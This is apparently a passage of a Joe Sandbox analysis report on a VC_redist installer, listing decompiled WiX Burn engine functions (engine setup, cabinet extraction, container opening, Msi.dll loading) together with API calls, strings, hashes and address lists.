                                                                          0x00017d99
                                                                          0x00017da0
                                                                          0x00017da3
                                                                          0x00017da6
                                                                          0x00017da9
                                                                          0x00017dac
                                                                          0x00017db3
                                                                          0x00017dba
                                                                          0x00017dbd
                                                                          0x00017dc0
                                                                          0x00017dc3
                                                                          0x00017dd7
                                                                          0x00017ddc
                                                                          0x00017de0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00017de2
                                                                          0x00017de3
                                                                          0x00017de9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00017deb
                                                                          0x00017dfe
                                                                          0x00017e10
                                                                          0x00017e10
                                                                          0x00017df6
                                                                          0x00000000

                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(00027378,000152B5,00000000,0001533D), ref: 00017523
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalInitializeSection
                                                                          • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleVersion
                                                                          • API String ID: 32694325-826827252
                                                                          • Opcode ID: 39762b779a8162d7c8d9ebabfacc4b7204146e5d3bc4a09e056d5c97b581e8df
                                                                          • Instruction ID: dcf21dc5ff895760df61de6aab3d68a12de7edb9a091ec9217db918dd34e646d
                                                                          • Opcode Fuzzy Hash: 39762b779a8162d7c8d9ebabfacc4b7204146e5d3bc4a09e056d5c97b581e8df
                                                                          • Instruction Fuzzy Hash: D13229B0C257798FDB65CF59C9887CDBAB8BB49B05F5081DAA50CA6210D7B50BC8CF84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00030E43 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 210COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1533 30e43-30e6f CoInitializeEx 1534 30e83-30ece call 4f364 1533->1534 1535 30e71-30e7e call 5012f 1533->1535 1541 30ed0-30ef3 call 137d3 call 5012f 1534->1541 1542 30ef8-30f1a call 4f374 1534->1542 1540 310df-310f1 call 3de36 1535->1540 1557 310d8-310d9 CoUninitialize 1541->1557 1549 30fd3-30fde SetEvent 1542->1549 1550 30f20-30f28 1542->1550 1554 30fe0-31009 call 137d3 1549->1554 1555 3101b-31029 WaitForSingleObject 1549->1555 1552 310d0-310d3 call 4f384 1550->1552 1553 30f2e-30f34 1550->1553 1552->1557 1553->1552 1558 30f3a-30f42 1553->1558 1583 3100e-31016 call 5012f 1554->1583 1559 3105b-31066 ResetEvent 1555->1559 1560 3102b-31059 call 137d3 1555->1560 1557->1540 1562 30f44-30f46 1558->1562 1563 30fbb-30fce call 5012f 1558->1563 1564 3109b-310a1 1559->1564 1565 31068-31096 call 137d3 1559->1565 1560->1583 1569 30f58-30f5b 1562->1569 1570 30f48-30f56 1562->1570 1563->1552 1567 310a3-310a6 1564->1567 1568 310cb 1564->1568 1565->1583 1575 310c7-310c9 1567->1575 1576 310a8-310c2 call 137d3 1567->1576 1568->1552 1579 30fb5 1569->1579 1580 30f5d 1569->1580 1577 30fb7-30fb9 1570->1577 1575->1552 1576->1583 1577->1549 1577->1563 1579->1577 1586 30fa3-30fa8 1580->1586 1587 30f72-30f77 1580->1587 1588 30fb1-30fb3 1580->1588 1589 30f80-30f85 1580->1589 1590 30f87-30f8c 1580->1590 1591 30f95-30f9a 1580->1591 1592 30f64-30f69 1580->1592 1593 30f6b-30f70 1580->1593 1594 30faa-30faf 1580->1594 1595 30f79-30f7e 1580->1595 1596 30f8e-30f93 1580->1596 1597 30f9c-30fa1 1580->1597 1583->1552 1586->1563 1587->1563 1588->1563 1589->1563 1590->1563 1591->1563 1592->1563 1593->1563 1594->1563 1595->1563 1596->1563 1597->1563
                                                                          APIs
                                                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 00030E65
                                                                          • CoUninitialize.OLE32 ref: 000310D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeUninitialize
                                                                          • String ID: <the>.cab$@Met$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                          • API String ID: 3442037557-3611498752
                                                                          • Opcode ID: bcd20306d7a3125bf9dc791cbfdb52cfe2d59f9ed8589d2c3d208a44d37cf483
                                                                          • Instruction ID: 4b9587b59a1d2feaab51743ac8573bdeb7fdc30482e0fc04819814a84402b06f
                                                                          • Opcode Fuzzy Hash: bcd20306d7a3125bf9dc791cbfdb52cfe2d59f9ed8589d2c3d208a44d37cf483
                                                                          • Instruction Fuzzy Hash: DF51AF36F45722EBD3322664CC55EEF759CDB45721F220235FD02BF680D6998C408AE6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000141D2 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158stringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1603 141d2-14229 InitializeCriticalSection * 2 call 24b0e * 2 1608 1434d-14357 call 1b389 1603->1608 1609 1422f 1603->1609 1614 1435c-14360 1608->1614 1610 14235-14242 1609->1610 1612 14340-14347 1610->1612 1613 14248-14274 lstrlenW * 2 CompareStringW 1610->1613 1612->1608 1612->1610 1615 142c6-142f2 lstrlenW * 2 CompareStringW 1613->1615 1616 14276-14299 lstrlenW 1613->1616 1617 14362-1436e call 5012f 1614->1617 1618 1436f-14377 1614->1618 1615->1612 1619 142f4-14317 lstrlenW 1615->1619 1620 14385-1439a call 137d3 1616->1620 1621 1429f-142a4 1616->1621 1617->1618 1624 143b1-143cb call 137d3 1619->1624 1625 1431d-14322 1619->1625 1632 1439f-143a6 1620->1632 1621->1620 1626 142aa-142ba call 129dc 1621->1626 1624->1632 1625->1624 1629 14328-14338 call 129dc 1625->1629 1638 142c0 1626->1638 1639 1437a-14383 1626->1639 1629->1639 1641 1433a 1629->1641 1636 143a7-143af call 5012f 1632->1636 1636->1618 1638->1615 1639->1636 1641->1612
                                                                          C-Code - Quality: 66%
                                                                          			E000141D2(void* __ecx, union _LARGE_INTEGER* __edx, void* __eflags, struct _CRITICAL_SECTION* _a4, signed int _a8) {
				char _v8;
				void* _t50;
				int _t55;
				WCHAR* _t56;
				int _t62;
				WCHAR* _t63;
				signed int _t69;
				intOrPtr* _t72;
				signed int _t76;
				struct _CRITICAL_SECTION* _t79;
				signed int _t83;
				void* _t89;
				void* _t93;
				union _LARGE_INTEGER* _t96;
				struct _CRITICAL_SECTION* _t98;
				void* _t100;
				void* _t103;

				_t96 = __edx;
				_push(__ecx);
				_a8 = _a8 | 0xffffffff;
				_t98 = _a4;
				_v8 = _a8;
				 *(_t98 + 0x498) =  *(_t98 + 0x498) | 0xffffffff;
				 *(_t98 + 0x494) = 1;
				InitializeCriticalSection(_t98);
				_t9 = _t98 + 0xd0; // 0xd0
				InitializeCriticalSection(_t9);
				_t10 = _t98 + 0x4a0; // 0x4a0
				E00024B0E(_t10);
				_t11 = _t98 + 0x4b8; // 0x4b8
				E00024B0E(_t11);
				_t83 = 0;
				if( *((intOrPtr*)(_t98 + 0x4dc)) <= 0) {
					L14:
					_t40 = _t98 + 0x48; // 0x48
					_t50 = E0001B389(_t96, _t40, _v8, _a8); // executed
					_t103 = _t50;
					if(_t103 < 0) {
						_push("Failed to initialize engine section.");
						_push(_t103);
						E0005012F();
					}
					L16:
					return _t103;
				}
				do {
					if( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)))) != 0x2d) {
						goto L13;
					}
					_t55 = lstrlenW(L"burn.filehandle.attached");
					_t56 = L"burn.filehandle.attached";
					if(CompareStringW(0x7f, 1,  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 2, lstrlenW(_t56), _t56, _t55) != 2) {
						L8:
						_t62 = lstrlenW(L"burn.filehandle.self");
						_t63 = L"burn.filehandle.self";
						if(CompareStringW(0x7f, 1,  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 2, lstrlenW(_t63), _t63, _t62) != 2) {
							goto L13;
						}
						_t69 = lstrlenW(L"burn.filehandle.self");
						_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 4 + _t69 * 2;
						_t89 = 0x3d;
						_a4 = _t72;
						if(_t89 !=  *((intOrPtr*)(_t72 - 2)) || 0 ==  *_t72) {
							_t100 = 0x80070057;
							E000137D3(_t72, "engine.cpp", 0x140, 0x80070057);
							_push(L"burn.filehandle.self");
							L19:
							_push("Missing required parameter for switch: %ls");
							_t103 = _t100;
							_push(_t100);
							goto L20;
						} else {
							_t103 = E000129DC( &_v8, _t96, _t72, 0,  &_v8);
							if(_t103 < 0) {
								L17:
								_push(_a4);
								_push("Failed to parse file handle: \'%ls\'");
								_push(_t103);
								L20:
								E0005012F();
								goto L16;
							}
							goto L13;
						}
					}
					_t76 = lstrlenW(L"burn.filehandle.attached");
					_t79 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 4 + _t76 * 2;
					_t93 = 0x3d;
					_a4 = _t79;
					if(_t93 !=  *((intOrPtr*)(_t79 - 2)) || 0 ==  *_t79) {
						_t100 = 0x80070057;
						E000137D3(_t79, "engine.cpp", 0x135, 0x80070057);
						_push(L"burn.filehandle.attached");
						goto L19;
					} else {
						_t103 = E000129DC( &_a8, _t96, _t79, 0,  &_a8);
						if(_t103 < 0) {
							goto L17;
						}
						goto L8;
					}
					L13:
					_t83 = _t83 + 1;
				} while (_t83 <  *((intOrPtr*)(_t98 + 0x4dc)));
				goto L14;
			}




















                                                                          0x000141d2
                                                                          0x000141d5
                                                                          0x000141d9
                                                                          0x000141e6
                                                                          0x000141ea
                                                                          0x000141ed
                                                                          0x000141f4
                                                                          0x000141fe
                                                                          0x00014200
                                                                          0x00014207
                                                                          0x00014209
                                                                          0x00014210
                                                                          0x00014215
                                                                          0x0001421c
                                                                          0x00014221
                                                                          0x00014229
                                                                          0x0001434d
                                                                          0x00014350
                                                                          0x00014357
                                                                          0x0001435c
                                                                          0x00014360
                                                                          0x00014362
                                                                          0x00014367
                                                                          0x00014368
                                                                          0x0001436e
                                                                          0x0001436f
                                                                          0x00014377
                                                                          0x00014377
                                                                          0x00014235
                                                                          0x00014242
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001424d
                                                                          0x00014250
                                                                          0x00014274
                                                                          0x000142c6
                                                                          0x000142cb
                                                                          0x000142ce
                                                                          0x000142f2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000142f9
                                                                          0x0001430d
                                                                          0x0001430f
                                                                          0x00014310
                                                                          0x00014317
                                                                          0x000143b1
                                                                          0x000143c1
                                                                          0x000143c6
                                                                          0x0001439f
                                                                          0x0001439f
                                                                          0x000143a4
                                                                          0x000143a6
                                                                          0x00000000
                                                                          0x00014328
                                                                          0x00014334
                                                                          0x00014338
                                                                          0x0001437a
                                                                          0x0001437a
                                                                          0x0001437d
                                                                          0x00014382
                                                                          0x000143a7
                                                                          0x000143a7
                                                                          0x00000000
                                                                          0x000143ac
                                                                          0x00000000
                                                                          0x0001433a
                                                                          0x00014317
                                                                          0x0001427b
                                                                          0x0001428f
                                                                          0x00014291
                                                                          0x00014292
                                                                          0x00014299
                                                                          0x00014385
                                                                          0x00014395
                                                                          0x0001439a
                                                                          0x00000000
                                                                          0x000142aa
                                                                          0x000142b6
                                                                          0x000142ba
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000142c0
                                                                          0x00014340
                                                                          0x00014340
                                                                          0x00014341
                                                                          0x00000000

                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,0001515E,?,?,00000000,?,?), ref: 000141FE
                                                                          • InitializeCriticalSection.KERNEL32(000000D0,?,?,0001515E,?,?,00000000,?,?), ref: 00014207
                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,0001515E,?,?,00000000,?,?), ref: 0001424D
                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,0001515E,?,?,00000000,?,?), ref: 00014257
                                                                          • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,0001515E,?,?,00000000,?,?), ref: 0001426B
                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,0001515E,?,?,00000000,?,?), ref: 0001427B
                                                                          • lstrlenW.KERNEL32(burn.filehandle.self,?,?,0001515E,?,?,00000000,?,?), ref: 000142CB
                                                                          • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,0001515E,?,?,00000000,?,?), ref: 000142D5
                                                                          • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,0001515E,?,?,00000000,?,?), ref: 000142E9
                                                                          • lstrlenW.KERNEL32(burn.filehandle.self,?,?,0001515E,?,?,00000000,?,?), ref: 000142F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                          • String ID: Failed to initialize user section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$user.cpp
                                                                          • API String ID: 3039292287-3209860532
                                                                          • Opcode ID: 8cc4345c4b6cd08f8e6b328f4443c0d90c5e2f65bfa436c63b2d0316bbf02333
                                                                          • Instruction ID: 71dbf36eb5d5a04e38a938321b8a9dd4e7c7384007ddcf215a060068056d9697
                                                                          • Opcode Fuzzy Hash: 8cc4345c4b6cd08f8e6b328f4443c0d90c5e2f65bfa436c63b2d0316bbf02333
                                                                          • Instruction Fuzzy Hash: 0C51A571A40215BFD7249F69DC46FEBB768EB04761F400115FA28DB2A0DB70BA94C7A4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001C129 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 128fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 54%
                                                                          			E0001C129(HANDLE* _a4, intOrPtr _a8, void* _a12, WCHAR* _a16) {
				void* _t29;
				int _t31;
				union _LARGE_INTEGER* _t33;
				int _t34;
				long _t38;
				signed short _t40;
				signed short _t43;
				void* _t47;
				signed short _t48;
				HANDLE* _t51;
				intOrPtr _t52;
				long _t55;
				union _LARGE_INTEGER _t65;

				_t52 = _a8;
				_t51 = _a4;
				_t51[6] =  *(_t52 + 4);
				_t55 = 0;
				_t65 = 0;
				_t51[4] =  *(_t52 + 0x18);
				_t51[5] =  *(_t52 + 0x1c);
				_t51[2] =  *(_t52 + 0x40);
				_t51[3] =  *(_t52 + 0x44);
				if(_a12 != 0xffffffff) {
					_t29 = GetCurrentProcess();
					_t31 = DuplicateHandle(GetCurrentProcess(), _a12, _t29, _t51, 0, 0, 2); // executed
					if(_t31 != 0) {
						_t65 = 0;
						goto L7;
					} else {
						_t43 = GetLastError();
						_t61 =  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
						_t55 =  >=  ? 0x80004005 :  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "container.cpp", 0xec, _t55);
						_push(_a16);
						_push("Failed to duplicate handle to container: %ls");
						goto L3;
					}
				} else {
					_t47 = CreateFileW(_a16, 0x80000000, 1, 0, 3, 0x8000080, 0);
					 *_t51 = _t47;
					if(_t47 != 0xffffffff) {
						L7:
						if( *((intOrPtr*)(_a8 + 0xc)) == _t55) {
							_t33 = _t55;
						} else {
							_t65 = _t51[2];
							_t33 = _t51[3];
						}
						_push(_t55);
						_t34 = SetFilePointerEx( *_t51, _t65, _t33, _t55); // executed
						if(_t34 != 0) {
							if(_t51[6] == 1) {
								_t38 = E00031484(_t51, _a16); // executed
								_t55 = _t38;
								if(_t55 < 0) {
									_push("Failed to open container.");
									goto L15;
								}
							}
						} else {
							_t40 = GetLastError();
							_t58 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
							_t55 =  >=  ? 0x80004005 :  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
							E000137D3(0x80004005, "container.cpp", 0xf8, _t55);
							_push("Failed to move file pointer to container offset.");
							L15:
							_push(_t55);
							E0005012F();
						}
					} else {
						_t48 = GetLastError();
						_t64 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
						_t55 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "container.cpp", 0xe6, _t55);
						_push(_a16);
						_push("Failed to open file: %ls");
						L3:
						_push(_t55);
						E0005012F();
					}
				}
				return _t55;
			}
















                                                                          0x0001c12c
                                                                          0x0001c130
                                                                          0x0001c138
                                                                          0x0001c13b
                                                                          0x0001c141
                                                                          0x0001c146
                                                                          0x0001c14c
                                                                          0x0001c152
                                                                          0x0001c158
                                                                          0x0001c15b
                                                                          0x0001c1d0
                                                                          0x0001c1d9
                                                                          0x0001c1e1
                                                                          0x0001c21b
                                                                          0x00000000
                                                                          0x0001c1e3
                                                                          0x0001c1e3
                                                                          0x0001c1f4
                                                                          0x0001c1fe
                                                                          0x0001c20c
                                                                          0x0001c211
                                                                          0x0001c214
                                                                          0x00000000
                                                                          0x0001c214
                                                                          0x0001c15d
                                                                          0x0001c170
                                                                          0x0001c176
                                                                          0x0001c17b
                                                                          0x0001c21d
                                                                          0x0001c223
                                                                          0x0001c22d
                                                                          0x0001c225
                                                                          0x0001c225
                                                                          0x0001c228
                                                                          0x0001c228
                                                                          0x0001c22f
                                                                          0x0001c235
                                                                          0x0001c23d
                                                                          0x0001c27a
                                                                          0x0001c280
                                                                          0x0001c285
                                                                          0x0001c289
                                                                          0x0001c28b
                                                                          0x00000000
                                                                          0x0001c28b
                                                                          0x0001c289
                                                                          0x0001c23f
                                                                          0x0001c23f
                                                                          0x0001c250
                                                                          0x0001c25a
                                                                          0x0001c268
                                                                          0x0001c26d
                                                                          0x0001c290
                                                                          0x0001c290
                                                                          0x0001c291
                                                                          0x0001c297
                                                                          0x0001c181
                                                                          0x0001c181
                                                                          0x0001c192
                                                                          0x0001c19c
                                                                          0x0001c1aa
                                                                          0x0001c1af
                                                                          0x0001c1b2
                                                                          0x0001c1b7
                                                                          0x0001c1b7
                                                                          0x0001c1b8
                                                                          0x0001c1bd
                                                                          0x0001c17b
                                                                          0x0001c29e

                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0001C319,000152FD,?,?,0001533D), ref: 0001C170
                                                                          • GetLastError.KERNEL32(?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?,00000000), ref: 0001C181
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?), ref: 0001C1D0
                                                                          • GetCurrentProcess.KERNEL32(000000FF,00000000,?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?,00000000), ref: 0001C1D6
                                                                          • DuplicateHandle.KERNELBASE(00000000,?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?,00000000), ref: 0001C1D9
                                                                          • GetLastError.KERNEL32(?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?,00000000), ref: 0001C1E3
                                                                          • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?,00000000), ref: 0001C235
                                                                          • GetLastError.KERNEL32(?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?,00000000), ref: 0001C23F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                          • String ID: @Met$Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                                          • API String ID: 2619879409-879908813
                                                                          • Opcode ID: 61ec5fec801fb19588f135c17dc8297eb065279db0f8f9df9bfb21411527f774
                                                                          • Instruction ID: 1c7781d3d922207403f5775dda54844068df580b1438cd98fa927af456ba1d60
                                                                          • Opcode Fuzzy Hash: 61ec5fec801fb19588f135c17dc8297eb065279db0f8f9df9bfb21411527f774
                                                                          • Instruction Fuzzy Hash: DB41B272280301ABEB209F6ADC45FA73BE9EB85751F114129FD08DB291DA75D841CB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000529B3 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 86libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000529B3(void* __ecx, void* __edx, void* __esi, void* __eflags) {
				signed int _v8;
				void* _t8;
				_Unknown_base(*)()* _t12;
				_Unknown_base(*)()* _t13;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				_Unknown_base(*)()* _t18;
				intOrPtr _t20;
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t30;
				intOrPtr _t32;
				void* _t36;

				_v8 = _v8 & 0x00000000;
				_t8 = E000137EA(__edx, L"Msi.dll", 0x7b680,  &_v8); // executed
				_t36 = _t8;
				if(_t36 >= 0) {
					E00054932(_v8, 0x7b684, 0x7b688); // executed
					_t12 = GetProcAddress( *0x7b680, "MsiDeterminePatchSequenceW");
					_t20 =  *0x7b68c; // 0x6d39be10
					_t21 =  ==  ? _t12 : _t20;
					 *0x7b6a8 = _t12;
					 *0x7b68c =  ==  ? _t12 : _t20;
					_t13 = GetProcAddress( *0x7b680, "MsiDetermineApplicablePatchesW");
					_t22 =  *0x7b690; // 0x6d39a130
					_t23 =  ==  ? _t13 : _t22;
					 *0x7b6ac = _t13;
					 *0x7b690 =  ==  ? _t13 : _t22;
					_t14 = GetProcAddress( *0x7b680, "MsiEnumProductsExW");
					_t24 =  *0x7b694; // 0x6d3a03d0
					_t25 =  ==  ? _t14 : _t24;
					 *0x7b6b0 = _t14;
					 *0x7b694 =  ==  ? _t14 : _t24;
					_t15 = GetProcAddress( *0x7b680, "MsiGetPatchInfoExW");
					_t26 =  *0x7b698; // 0x6d3a3560
					_t27 =  ==  ? _t15 : _t26;
					 *0x7b6b4 = _t15;
					 *0x7b698 =  ==  ? _t15 : _t26;
					_t16 = GetProcAddress( *0x7b680, "MsiGetProductInfoExW");
					_t28 =  *0x7b69c; // 0x6d2cac90
					_t29 =  ==  ? _t16 : _t28;
					 *0x7b6b8 = _t16;
					 *0x7b69c =  ==  ? _t16 : _t28;
					_t17 = GetProcAddress( *0x7b680, "MsiSetExternalUIRecord");
					_t30 =  *0x7b6a0; // 0x6d3a71b0
					_t31 =  ==  ? _t17 : _t30;
					 *0x7b6bc = _t17;
					 *0x7b6a0 =  ==  ? _t17 : _t30;
					_t18 = GetProcAddress( *0x7b680, "MsiSourceListAddSourceExW");
					_t32 =  *0x7b6a4; // 0x6d3a7ec0
					 *0x7b6c0 = _t18;
					_t33 =  ==  ? _t18 : _t32;
					 *0x7b6c4 = 1;
					 *0x7b6a4 =  ==  ? _t18 : _t32;
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t36;
			}




















                                                                          0x000529b7
                                                                          0x000529ca
                                                                          0x000529cf
                                                                          0x000529d3
                                                                          0x000529e7
                                                                          0x000529fd
                                                                          0x000529ff
                                                                          0x00052a12
                                                                          0x00052a15
                                                                          0x00052a1a
                                                                          0x00052a20
                                                                          0x00052a22
                                                                          0x00052a35
                                                                          0x00052a38
                                                                          0x00052a3d
                                                                          0x00052a43
                                                                          0x00052a45
                                                                          0x00052a58
                                                                          0x00052a5b
                                                                          0x00052a60
                                                                          0x00052a66
                                                                          0x00052a68
                                                                          0x00052a7b
                                                                          0x00052a7e
                                                                          0x00052a83
                                                                          0x00052a89
                                                                          0x00052a8b
                                                                          0x00052a9e
                                                                          0x00052aa1
                                                                          0x00052aa6
                                                                          0x00052aac
                                                                          0x00052aae
                                                                          0x00052ac1
                                                                          0x00052ac4
                                                                          0x00052ac9
                                                                          0x00052acf
                                                                          0x00052ad1
                                                                          0x00052ad9
                                                                          0x00052ade
                                                                          0x00052ae1
                                                                          0x00052aeb
                                                                          0x00052af1
                                                                          0x00052af6
                                                                          0x00052afb
                                                                          0x00052afb
                                                                          0x00052b06

                                                                          APIs
                                                                            • Part of subcall function 000137EA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00013829
                                                                            • Part of subcall function 000137EA: GetLastError.KERNEL32 ref: 00013833
                                                                            • Part of subcall function 00054932: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 0005495A
                                                                          • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 000529FD
                                                                          • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00052A20
                                                                          • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00052A43
                                                                          • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00052A66
                                                                          • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00052A89
                                                                          • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00052AAC
                                                                          • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00052ACF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                          • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                          • API String ID: 2510051996-1735120554
